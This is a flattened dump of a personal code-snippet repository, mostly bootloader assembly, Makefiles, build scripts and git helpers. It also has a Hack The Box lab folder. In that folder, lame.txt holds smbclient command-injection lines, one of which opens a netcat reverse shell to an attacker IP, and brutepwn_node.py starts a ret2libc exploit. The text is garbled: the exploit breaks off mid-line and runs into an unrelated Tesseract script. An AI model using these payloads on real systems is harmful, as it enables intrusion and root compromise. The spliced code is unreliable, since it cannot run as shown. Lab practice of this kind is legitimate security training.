├── .gitignore ├── hacking └── HTB │ ├── Nightmare │ ├── __init__.py │ ├── request.txt │ └── nightmare_tamper.py │ ├── Fulcrum │ └── socat │ ├── Reddish │ └── socat │ ├── LaCasaDePapel │ ├── hook64.so │ └── autopwn_lacasadepapel.py │ ├── Tally │ ├── cve2017213ps.cpp │ └── cve2017213ps.exe │ ├── Lame │ └── lame.txt │ ├── Node │ └── brutepwn_node.py │ ├── Enterprise │ └── pwn_lcars.py │ ├── FluxCapacitor │ └── autopwn_flux.py │ ├── Sense │ └── autopwn_sense.py │ └── Nineveh │ └── lfiphpinfo.py ├── README.md ├── os ├── part1 │ ├── kernel │ │ └── kernel.asm │ ├── stage2 │ │ └── bootstage2.asm │ ├── run.sh │ ├── os.bin │ ├── Makefile │ ├── os.asm │ └── stage1 │ │ ├── print.asm │ │ ├── bootstage1.asm │ │ └── disk.asm ├── part2 │ ├── run.sh │ ├── os.bin │ ├── Makefile │ ├── os.asm │ ├── kernel │ │ └── kernel.asm │ ├── stage2 │ │ ├── bootstage2.asm │ │ ├── longmode.asm │ │ └── pic.asm │ └── stage1 │ │ ├── print.asm │ │ ├── bootstage1.asm │ │ └── disk.asm ├── part3 │ ├── run.sh │ ├── os.bin │ ├── Makefile │ ├── os.asm │ ├── stage2 │ │ ├── bootstage2.asm │ │ ├── longmode.asm │ │ ├── pic.asm │ │ └── paging.asm │ ├── stage1 │ │ ├── print.asm │ │ ├── bootstage1.asm │ │ └── disk.asm │ └── kernel │ │ ├── kernel.asm │ │ ├── isr.asm │ │ └── video.asm ├── part4 │ ├── run.sh │ ├── os.bin │ ├── Makefile │ ├── os.asm │ ├── stage2 │ │ ├── bootstage2.asm │ │ ├── longmode.asm │ │ ├── pic.asm │ │ └── paging.asm │ ├── stage1 │ │ ├── print.asm │ │ ├── bootstage1.asm │ │ └── disk.asm │ └── kernel │ │ ├── kernel.asm │ │ └── video.asm └── part5 │ ├── run.sh │ ├── os.bin │ ├── Makefile │ ├── os.asm │ ├── stage2 │ ├── bootstage2.asm │ ├── longmode.asm │ ├── e280_mapping.asm │ ├── pic.asm │ └── paging.asm │ ├── stage1 │ ├── print.asm │ ├── bootstage1.asm │ └── disk.asm │ └── kernel │ └── kernel.asm ├── kivy ├── dlgback_red.png └── dlgback_green.png ├── nl80211_info ├── nl80211_info └── makefile ├── raspberry_pi_os └── part1 │ ├── run.sh │ ├── kernel8.img │ ├── config.txt │ ├── Makefile │ ├── 
linker.ld │ ├── uart.S │ └── boot.S ├── shutdown_manager ├── images │ ├── Lock.png │ ├── Sleep.png │ ├── Cancel.png │ ├── Logout.png │ ├── Reboot.png │ ├── Shutdown.png │ ├── Hibernate.png │ ├── Restart WM.png │ └── Sleep + Hibernate.png ├── shutdown-manager-plain └── shutdown-manager-plain-gtk3 ├── graphics └── SutherlandHodgman │ ├── Linux │ ├── SutherlandHodgman1 │ ├── SutherlandHodgman2 │ ├── makefile │ └── zpr.h │ ├── Windows │ ├── SutherlandHodgman.zip │ └── SutherlandHodgman │ │ ├── lib │ │ ├── glew32.lib │ │ ├── glew32s.lib │ │ ├── freeglut.lib │ │ └── x64 │ │ │ ├── glew32.lib │ │ │ ├── freeglut.lib │ │ │ └── glew32s.lib │ │ ├── Release │ │ ├── glew32.dll │ │ ├── freeglut.dll │ │ └── SutherlandHodgman.exe │ │ ├── x64 │ │ └── Release │ │ │ ├── glew32.dll │ │ │ ├── freeglut.dll │ │ │ └── SutherlandHodgman.exe │ │ ├── SutherlandHodgman.vcxproj.user │ │ ├── include │ │ └── GL │ │ │ ├── glut.h │ │ │ └── freeglut.h │ │ ├── SutherlandHodgman.sln │ │ ├── zpr.h │ │ └── SutherlandHodgman.vcxproj.filters │ └── README.md ├── crypto ├── ebola_challenge_info_[use_flag_for_password].zip ├── xor_encrypted_text.bin ├── cordova-aes.py └── xorknown.py ├── hg_git ├── h ├── g ├── git-init-bitbucket-repo └── hg-init-bitbucket-repo ├── xkb └── 10-keyboard.conf ├── winrm ├── winrm_shell.rb └── winrm_shell_with_upload.rb ├── tesseract └── tesseract_train.sh ├── linker.ld ├── LICENSE ├── share_internet └── share_internet_simpe.sh ├── path_traversal ├── path_traversal_archiver.nim └── path_traversal_archiver.py ├── outlook └── get_outlook_forwarding_rules.ps1 ├── enum └── htbscan.py ├── vms └── vm_new ├── mssql └── mssql_shell.py └── encodings └── test_encodings.py /.gitignore: -------------------------------------------------------------------------------- 1 | *.o 2 | -------------------------------------------------------------------------------- /hacking/HTB/Nightmare/__init__.py: -------------------------------------------------------------------------------- 1 | 
-------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # code-snippets 2 | Various code snippets. 3 | -------------------------------------------------------------------------------- /os/part1/kernel/kernel.asm: -------------------------------------------------------------------------------- 1 | ; Dummy file 2 | 3 | times 512 db 0 4 | -------------------------------------------------------------------------------- /os/part1/stage2/bootstage2.asm: -------------------------------------------------------------------------------- 1 | ; Dummy file 2 | 3 | times 512 db 0 4 | -------------------------------------------------------------------------------- /os/part1/run.sh: -------------------------------------------------------------------------------- 1 | make && qemu-system-x86_64 -m 2M -drive format=raw,file=os.bin 2 | -------------------------------------------------------------------------------- /os/part2/run.sh: -------------------------------------------------------------------------------- 1 | make && qemu-system-x86_64 -m 2M -drive format=raw,file=os.bin 2 | -------------------------------------------------------------------------------- /os/part3/run.sh: -------------------------------------------------------------------------------- 1 | make && qemu-system-x86_64 -m 2M -drive format=raw,file=os.bin 2 | -------------------------------------------------------------------------------- /os/part4/run.sh: -------------------------------------------------------------------------------- 1 | make && qemu-system-x86_64 -m 2M -drive format=raw,file=os.bin 2 | -------------------------------------------------------------------------------- /os/part5/run.sh: -------------------------------------------------------------------------------- 1 | make && qemu-system-x86_64 -m 2M -drive format=raw,file=os.bin 2 | 
-------------------------------------------------------------------------------- /os/part1/os.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/os/part1/os.bin -------------------------------------------------------------------------------- /os/part2/os.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/os/part2/os.bin -------------------------------------------------------------------------------- /os/part3/os.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/os/part3/os.bin -------------------------------------------------------------------------------- /os/part4/os.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/os/part4/os.bin -------------------------------------------------------------------------------- /os/part5/os.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/os/part5/os.bin -------------------------------------------------------------------------------- /kivy/dlgback_red.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/kivy/dlgback_red.png -------------------------------------------------------------------------------- /kivy/dlgback_green.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/kivy/dlgback_green.png -------------------------------------------------------------------------------- /hacking/HTB/Fulcrum/socat: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/hacking/HTB/Fulcrum/socat -------------------------------------------------------------------------------- /hacking/HTB/Reddish/socat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/hacking/HTB/Reddish/socat -------------------------------------------------------------------------------- /nl80211_info/nl80211_info: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/nl80211_info/nl80211_info -------------------------------------------------------------------------------- /raspberry_pi_os/part1/run.sh: -------------------------------------------------------------------------------- 1 | qemu-system-aarch64 -M raspi3b -kernel kernel8.img -serial mon:stdio 2 | 3 | 4 | -------------------------------------------------------------------------------- /raspberry_pi_os/part1/kernel8.img: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/raspberry_pi_os/part1/kernel8.img -------------------------------------------------------------------------------- /shutdown_manager/images/Lock.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/shutdown_manager/images/Lock.png -------------------------------------------------------------------------------- /shutdown_manager/images/Sleep.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/shutdown_manager/images/Sleep.png -------------------------------------------------------------------------------- /hacking/HTB/LaCasaDePapel/hook64.so: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/hacking/HTB/LaCasaDePapel/hook64.so -------------------------------------------------------------------------------- /hacking/HTB/Tally/cve2017213ps.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/hacking/HTB/Tally/cve2017213ps.cpp -------------------------------------------------------------------------------- /hacking/HTB/Tally/cve2017213ps.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/hacking/HTB/Tally/cve2017213ps.exe -------------------------------------------------------------------------------- /shutdown_manager/images/Cancel.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/shutdown_manager/images/Cancel.png -------------------------------------------------------------------------------- /shutdown_manager/images/Logout.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/shutdown_manager/images/Logout.png -------------------------------------------------------------------------------- /shutdown_manager/images/Reboot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/shutdown_manager/images/Reboot.png -------------------------------------------------------------------------------- /shutdown_manager/images/Shutdown.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/shutdown_manager/images/Shutdown.png 
-------------------------------------------------------------------------------- /shutdown_manager/images/Hibernate.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/shutdown_manager/images/Hibernate.png -------------------------------------------------------------------------------- /shutdown_manager/images/Restart WM.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/shutdown_manager/images/Restart WM.png -------------------------------------------------------------------------------- /shutdown_manager/images/Sleep + Hibernate.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/shutdown_manager/images/Sleep + Hibernate.png -------------------------------------------------------------------------------- /graphics/SutherlandHodgman/Linux/SutherlandHodgman1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/graphics/SutherlandHodgman/Linux/SutherlandHodgman1 -------------------------------------------------------------------------------- /graphics/SutherlandHodgman/Linux/SutherlandHodgman2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/graphics/SutherlandHodgman/Linux/SutherlandHodgman2 -------------------------------------------------------------------------------- /crypto/ebola_challenge_info_[use_flag_for_password].zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/crypto/ebola_challenge_info_[use_flag_for_password].zip -------------------------------------------------------------------------------- 
/graphics/SutherlandHodgman/Windows/SutherlandHodgman.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/graphics/SutherlandHodgman/Windows/SutherlandHodgman.zip -------------------------------------------------------------------------------- /os/part1/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: clean, .force-rebuild 2 | all: bootloader.bin 3 | 4 | bootloader.bin: os.asm .force-rebuild 5 | nasm -fbin os.asm -o os.bin 6 | 7 | clean: 8 | rm *.bin 9 | -------------------------------------------------------------------------------- /os/part2/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: clean, .force-rebuild 2 | all: bootloader.bin 3 | 4 | bootloader.bin: os.asm .force-rebuild 5 | nasm -fbin os.asm -o os.bin 6 | 7 | clean: 8 | rm *.bin 9 | -------------------------------------------------------------------------------- /os/part3/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: clean, .force-rebuild 2 | all: bootloader.bin 3 | 4 | bootloader.bin: os.asm .force-rebuild 5 | nasm -fbin os.asm -o os.bin 6 | 7 | clean: 8 | rm *.bin 9 | -------------------------------------------------------------------------------- /os/part4/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: clean, .force-rebuild 2 | all: bootloader.bin 3 | 4 | bootloader.bin: os.asm .force-rebuild 5 | nasm -fbin os.asm -o os.bin 6 | 7 | clean: 8 | rm *.bin 9 | -------------------------------------------------------------------------------- /os/part5/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: clean, .force-rebuild 2 | all: bootloader.bin 3 | 4 | bootloader.bin: os.asm .force-rebuild 5 | nasm -fbin os.asm -o os.bin 6 | 7 | clean: 8 | rm 
*.bin 9 | -------------------------------------------------------------------------------- /graphics/SutherlandHodgman/Windows/SutherlandHodgman/lib/glew32.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/graphics/SutherlandHodgman/Windows/SutherlandHodgman/lib/glew32.lib -------------------------------------------------------------------------------- /graphics/SutherlandHodgman/Windows/SutherlandHodgman/lib/glew32s.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/graphics/SutherlandHodgman/Windows/SutherlandHodgman/lib/glew32s.lib -------------------------------------------------------------------------------- /graphics/SutherlandHodgman/Windows/SutherlandHodgman/Release/glew32.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/graphics/SutherlandHodgman/Windows/SutherlandHodgman/Release/glew32.dll -------------------------------------------------------------------------------- /graphics/SutherlandHodgman/Windows/SutherlandHodgman/lib/freeglut.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/graphics/SutherlandHodgman/Windows/SutherlandHodgman/lib/freeglut.lib -------------------------------------------------------------------------------- /graphics/SutherlandHodgman/Windows/SutherlandHodgman/lib/x64/glew32.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/graphics/SutherlandHodgman/Windows/SutherlandHodgman/lib/x64/glew32.lib -------------------------------------------------------------------------------- /graphics/SutherlandHodgman/Windows/SutherlandHodgman/Release/freeglut.dll: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/graphics/SutherlandHodgman/Windows/SutherlandHodgman/Release/freeglut.dll -------------------------------------------------------------------------------- /graphics/SutherlandHodgman/Windows/SutherlandHodgman/lib/x64/freeglut.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/graphics/SutherlandHodgman/Windows/SutherlandHodgman/lib/x64/freeglut.lib -------------------------------------------------------------------------------- /graphics/SutherlandHodgman/Windows/SutherlandHodgman/lib/x64/glew32s.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/graphics/SutherlandHodgman/Windows/SutherlandHodgman/lib/x64/glew32s.lib -------------------------------------------------------------------------------- /graphics/SutherlandHodgman/Windows/SutherlandHodgman/x64/Release/glew32.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/graphics/SutherlandHodgman/Windows/SutherlandHodgman/x64/Release/glew32.dll -------------------------------------------------------------------------------- /graphics/SutherlandHodgman/Windows/SutherlandHodgman/x64/Release/freeglut.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/graphics/SutherlandHodgman/Windows/SutherlandHodgman/x64/Release/freeglut.dll -------------------------------------------------------------------------------- /hacking/HTB/Lame/lame.txt: -------------------------------------------------------------------------------- 1 | smbclient -U "/=\`nohup cat /root/root.txt > /tmp/ttt\`" -N -I 10.10.10.3 //LAME/tmp 2 | 3 | 
smbclient -U "/=\`nohup nc -e /bin/sh 10.10.15.11 60000\`" -N -I 10.10.10.3 //LAME/tmp 4 | -------------------------------------------------------------------------------- /graphics/SutherlandHodgman/Windows/SutherlandHodgman/Release/SutherlandHodgman.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/graphics/SutherlandHodgman/Windows/SutherlandHodgman/Release/SutherlandHodgman.exe -------------------------------------------------------------------------------- /graphics/SutherlandHodgman/Windows/SutherlandHodgman/x64/Release/SutherlandHodgman.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alamot/code-snippets/HEAD/graphics/SutherlandHodgman/Windows/SutherlandHodgman/x64/Release/SutherlandHodgman.exe -------------------------------------------------------------------------------- /raspberry_pi_os/part1/config.txt: -------------------------------------------------------------------------------- 1 | arm_64bit=1 # Boot to 64-bit mode 2 | dtoverlay=pi3-disable-bt # Disable bluetooth (to free UART) 3 | enable_uart=1 # Enable UART 4 | os_check=0 # Don't check OS compatibility 5 | -------------------------------------------------------------------------------- /graphics/SutherlandHodgman/Linux/makefile: -------------------------------------------------------------------------------- 1 | CXXFLAGS+=-g -Wall -std=c++11 2 | LDLIBS+=-lglut -lGL -lGLU -lGLEW -lm 3 | all: SutherlandHodgman 4 | SutherlandHodgman: SutherlandHodgman.o zpr.o 5 | g++ $(CFLAGS) -o SutherlandHodgman zpr.o $< $(LDLIBS) 6 | clean: 7 | rm -f *.o 8 | -------------------------------------------------------------------------------- /hg_git/h: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [ $# -eq 0 ] 4 | then 5 | echo "No message supplied. Using current date." 
6 | hg commit -m "Automatic commit $(date)" 7 | else 8 | str="'$*'" 9 | echo "Message: $str" 10 | bash -c "hg commit -m ${str}" 11 | fi 12 | hg push 13 | -------------------------------------------------------------------------------- /hg_git/g: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [ $# -eq 0 ] 4 | then 5 | echo "No message supplied. Using current date." 6 | git commit -a -m "Automatic commit $(date)" 7 | else 8 | str="'$*'" 9 | echo "Message: $str" 10 | bash -c "git commit -a -m ${str}" 11 | fi 12 | git push origin master 13 | -------------------------------------------------------------------------------- /graphics/SutherlandHodgman/Windows/SutherlandHodgman/SutherlandHodgman.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | true 5 | 6 | -------------------------------------------------------------------------------- /graphics/SutherlandHodgman/README.md: -------------------------------------------------------------------------------- 1 | # 3D visualization of Sutherland-Hodgman algorithm (polygon clipping) 2 | 3 | ## Controls 4 | 5 | * Rotation: Left mouse click 6 | * Zooming: Middle mouse click 7 | * Panning: Right mouse click 8 | * Proceed to the next step of Sutherland-Hodgman algorithm: Any key in the keyboard (except Esc) 9 | * Exit: Esc 10 | -------------------------------------------------------------------------------- /os/part1/os.asm: -------------------------------------------------------------------------------- 1 | stage1_start: 2 | times 90 db 0 ; BPB (BIOS Parameter Block) will go here 3 | %include "stage1/bootstage1.asm" 4 | stage1_end: 5 | 6 | stage2_start: 7 | %include "stage2/bootstage2.asm" 8 | align 512, db 0 9 | stage2_end: 10 | 11 | kernel_start: 12 | %include "kernel/kernel.asm" 13 | align 512, db 0 14 | kernel_end: 15 | -------------------------------------------------------------------------------- 
/os/part2/os.asm: -------------------------------------------------------------------------------- 1 | stage1_start: 2 | times 90 db 0 ; BPB (BIOS Parameter Block) will go here 3 | %include "stage1/bootstage1.asm" 4 | stage1_end: 5 | 6 | stage2_start: 7 | %include "stage2/bootstage2.asm" 8 | align 512, db 0 9 | stage2_end: 10 | 11 | kernel_start: 12 | %include "kernel/kernel.asm" 13 | align 512, db 0 14 | kernel_end: 15 | -------------------------------------------------------------------------------- /os/part3/os.asm: -------------------------------------------------------------------------------- 1 | stage1_start: 2 | times 90 db 0 ; BPB (BIOS Parameter Block) will go here 3 | %include "stage1/bootstage1.asm" 4 | stage1_end: 5 | 6 | stage2_start: 7 | %include "stage2/bootstage2.asm" 8 | align 512, db 0 9 | stage2_end: 10 | 11 | kernel_start: 12 | %include "kernel/kernel.asm" 13 | align 512, db 0 14 | kernel_end: 15 | -------------------------------------------------------------------------------- /os/part4/os.asm: -------------------------------------------------------------------------------- 1 | stage1_start: 2 | times 90 db 0 ; BPB (BIOS Parameter Block) will go here 3 | %include "stage1/bootstage1.asm" 4 | stage1_end: 5 | 6 | stage2_start: 7 | %include "stage2/bootstage2.asm" 8 | align 512, db 0 9 | stage2_end: 10 | 11 | kernel_start: 12 | %include "kernel/kernel.asm" 13 | align 512, db 0 14 | kernel_end: 15 | -------------------------------------------------------------------------------- /os/part5/os.asm: -------------------------------------------------------------------------------- 1 | ; Author: Alamot 2 | 3 | stage1_start: 4 | times 90 db 0 ; BPB (BIOS Parameter Block) will go here 5 | %include "stage1/bootstage1.asm" 6 | stage1_end: 7 | 8 | stage2_start: 9 | %include "stage2/bootstage2.asm" 10 | align 512, db 0 11 | stage2_end: 12 | 13 | kernel_start: 14 | %include "kernel/kernel.asm" 15 | align 512, db 0 16 | kernel_end: 17 | 
-------------------------------------------------------------------------------- /raspberry_pi_os/part1/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: clean, .force-rebuild 2 | all: kernel8.img 3 | 4 | kernel8.img: boot.S uart.S .force-rebuild 5 | aarch64-linux-gnu-as -o boot.o boot.S 6 | aarch64-linux-gnu-as -o uart.o uart.S 7 | aarch64-linux-gnu-ld -T linker.ld -o kernel.elf boot.o uart.o 8 | aarch64-linux-gnu-objcopy -O binary kernel.elf kernel8.img 9 | 10 | clean: 11 | rm *.o 12 | rm *.elf 13 | rm *.img 14 | -------------------------------------------------------------------------------- /xkb/10-keyboard.conf: -------------------------------------------------------------------------------- 1 | 2 | Section "InputClass" 3 | Identifier "keyboard-all" 4 | Driver "evdev" 5 | Option "XkbLayout" "us,gr,ru" 6 | Option "XkbModel" "microsoft" 7 | Option "XkbRules" "xorg" 8 | Option "XkbOptions" "grp:caps_toggle,grp_led:scroll,terminate:ctrl_alt_bksp" 9 | Option "XkbVariant" "altgr-intl,,phonetic_winkeys" 10 | MatchIsKeyboard "on" 11 | EndSection 12 | -------------------------------------------------------------------------------- /nl80211_info/makefile: -------------------------------------------------------------------------------- 1 | CC=gcc 2 | LDFLAGS=$(shell pkg-config --libs libnl-genl-3.0) 3 | DEBUG_FLAGS=-DDEBUG=1 -std=c99 -Wall -Wextra -Wpedantic -g 4 | FLAGS=-std=c99 -Wall -Wpedantic -Wno-unused-parameter 5 | ifeq (${DEBUG},1) 6 | FLAGS+=${DEBUG_FLAGS} 7 | endif 8 | FLAGS += $(shell pkg-config --cflags libnl-genl-3.0) 9 | 10 | nl80211_info: nl80211_info.o 11 | ${CC} -o $@ nl80211_info.o ${LDFLAGS} ${FLAGS} 12 | 13 | nl80211_info.o: nl80211_info.c 14 | ${CC} -o $@ -c $< ${FLAGS} 15 | 16 | clean: 17 | rm -rf *.o 18 | -------------------------------------------------------------------------------- /hacking/HTB/Nightmare/request.txt: 
-------------------------------------------------------------------------------- 1 | POST /register.php HTTP/1.1 2 | Host: 10.10.10.66 3 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 4 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 5 | Accept-Language: en-US,en;q=0.5 6 | Referer: http://10.10.10.66/register.php 7 | Cookie: PHPSESSID=542o6dt0740orfbgg6kbujl8b5 8 | Connection: close 9 | Content-Type: application/x-www-form-urlencoded 10 | Content-Length: 105 11 | 12 | user=admin&pass=pass&register=Register -------------------------------------------------------------------------------- /winrm/winrm_shell.rb: -------------------------------------------------------------------------------- 1 | require 'winrm' 2 | 3 | # Author: Alamot 4 | 5 | conn = WinRM::Connection.new( 6 | endpoint: 'https://IP:PORT/wsman', 7 | transport: :ssl, 8 | user: 'username', 9 | password: 'password', 10 | :no_ssl_peer_verification => true 11 | ) 12 | 13 | command="" 14 | 15 | conn.shell(:powershell) do |shell| 16 | until command == "exit\n" do 17 | output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')") 18 | print(output.output.chomp) 19 | command = gets 20 | output = shell.run(command) do |stdout, stderr| 21 | STDOUT.print stdout 22 | STDERR.print stderr 23 | end 24 | end 25 | puts "Exiting with code #{output.exitcode}" 26 | end 27 | -------------------------------------------------------------------------------- /graphics/SutherlandHodgman/Windows/SutherlandHodgman/include/GL/glut.h: -------------------------------------------------------------------------------- 1 | #ifndef __GLUT_H__ 2 | #define __GLUT_H__ 3 | 4 | /* 5 | * glut.h 6 | * 7 | * The freeglut library include file 8 | * 9 | * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS 10 | * OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 11 | * FITNESS FOR A PARTICULAR PURPOSE AND 
NONINFRINGEMENT. IN NO EVENT SHALL 12 | * PAWEL W. OLSZTA BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER 13 | * IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN 14 | * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 15 | */ 16 | 17 | #include "freeglut_std.h" 18 | 19 | /*** END OF FILE ***/ 20 | 21 | #endif /* __GLUT_H__ */ 22 | -------------------------------------------------------------------------------- /graphics/SutherlandHodgman/Windows/SutherlandHodgman/include/GL/freeglut.h: -------------------------------------------------------------------------------- 1 | #ifndef __FREEGLUT_H__ 2 | #define __FREEGLUT_H__ 3 | 4 | /* 5 | * freeglut.h 6 | * 7 | * The freeglut library include file 8 | * 9 | * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS 10 | * OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 11 | * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL 12 | * PAWEL W. OLSZTA BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER 13 | * IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN 14 | * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 15 | */ 16 | 17 | #include "freeglut_std.h" 18 | #include "freeglut_ext.h" 19 | 20 | /*** END OF FILE ***/ 21 | 22 | #endif /* __FREEGLUT_H__ */ 23 | -------------------------------------------------------------------------------- /os/part2/kernel/kernel.asm: -------------------------------------------------------------------------------- 1 | ; Author: Alamot 2 | 3 | BITS 64 ; We have entered the long mode! 
:) 4 | 5 | ;---Constants------------------------------------------------------------------- 6 | VRAM equ KERNEL_VIRT_BASE + 0xB8000 7 | 8 | ;---Code------------------------------------------------------------------------ 9 | Kernel_entrypoint: 10 | ;********************************************************************; 11 | ; Just some dummy code for now ; 12 | ;********************************************************************; 13 | ; Set RDI to point to Video RAM (KERNEL_VIRT_BASE + 0xB8000) 14 | mov rdi, VRAM 15 | 16 | ; Print "Hello World!" 17 | mov rax, 0x1F6C1F6C1F651F48 18 | mov [rdi], rax 19 | mov rax, 0x1F6F1F571F201F6F 20 | mov [rdi + 8], rax 21 | mov rax, 0x1F211F641F6C1F72 22 | mov [rdi + 16], rax 23 | 24 | .halt: hlt 25 | jmp .halt ; Infinite loop. 26 | 27 | -------------------------------------------------------------------------------- /hg_git/git-init-bitbucket-repo: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [ "$#" -ne 2 ]; then 4 | echo "Usage: ${0##*/} bitbucket_username(not email) repository_name" >&2 5 | exit 1 6 | fi 7 | username="$1" 8 | reponame="$2" 9 | printf "\nPlease insert Bitbucket password: " 10 | read -s password 11 | 12 | #Create repo using curl and Bitbucket REST API v2.0 13 | curl -X POST -v -u $username:$password -H "Content-Type: application/json" \ 14 | https://api.bitbucket.org/2.0/repositories/$username/$reponame \ 15 | -d '{"scm": "git", "is_private": "true", "fork_policy": "no_public_forks" }' 16 | 17 | printf "\nRemote repository https://$username@bitbucket.org/$username/$reponame.git created\n\n" 18 | 19 | git init 20 | git add . 
21 | git commit -a -m "Initial automatic commit $(date)" 22 | git remote add origin https://$username@bitbucket.org/$username/$reponame.git 23 | 24 | #If you want to store the password uncomment the next line 25 | #git config credential.helper store 26 | 27 | git push -u origin master 28 | 29 | printf "\nFinished\n\n" 30 | -------------------------------------------------------------------------------- /hacking/HTB/Node/brutepwn_node.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | import struct 3 | from subprocess import call 4 | 5 | libc_base_addr = 0xf752c000 # ldd /usr/local/bin/backup (choose an average value) 6 | exit_off = 0x0002e7b0 # readelf -s /lib32/libc.so.6 | grep exit 7 | system_off = 0x0003a940 # readelf -s /lib32/libc.so.6 | grep system 8 | system_addr = libc_base_addr + system_off 9 | exit_addr = libc_base_addr + exit_off 10 | system_arg = libc_base_addr + 0x15900b # strings -a -t x /lib32/libc.so.6 | grep '/bin/sh' 11 | 12 | #endianess convertion 13 | def conv(num): 14 | return struct.pack(" font_properties # tell Tesseract informations about the font 18 | mftraining -F font_properties -U unicharset -O hsk.unicharset `wrap $N "hsk.ocrb.exp" ".tr"` 19 | cntraining `wrap $N "hsk.ocrb.exp" ".tr"` 20 | # rename all files created by mftraing en cntraining, add the prefix hsk.: 21 | mv inttemp hsk.inttemp 22 | mv normproto hsk.normproto 23 | mv pffmtable hsk.pffmtable 24 | mv shapetable hsk.shapetable 25 | combine_tessdata hsk. 26 | -------------------------------------------------------------------------------- /raspberry_pi_os/part1/linker.ld: -------------------------------------------------------------------------------- 1 | /* Linker Script: Defines the memory layout */ 2 | 3 | ENTRY(_start) 4 | 5 | SECTIONS { 6 | . = 0x80000; /* The kernel code must start at the address 0x80000 for Raspberry Pi. */ 7 | .text : { *(.text) } :read_execute /* Code goes here. 
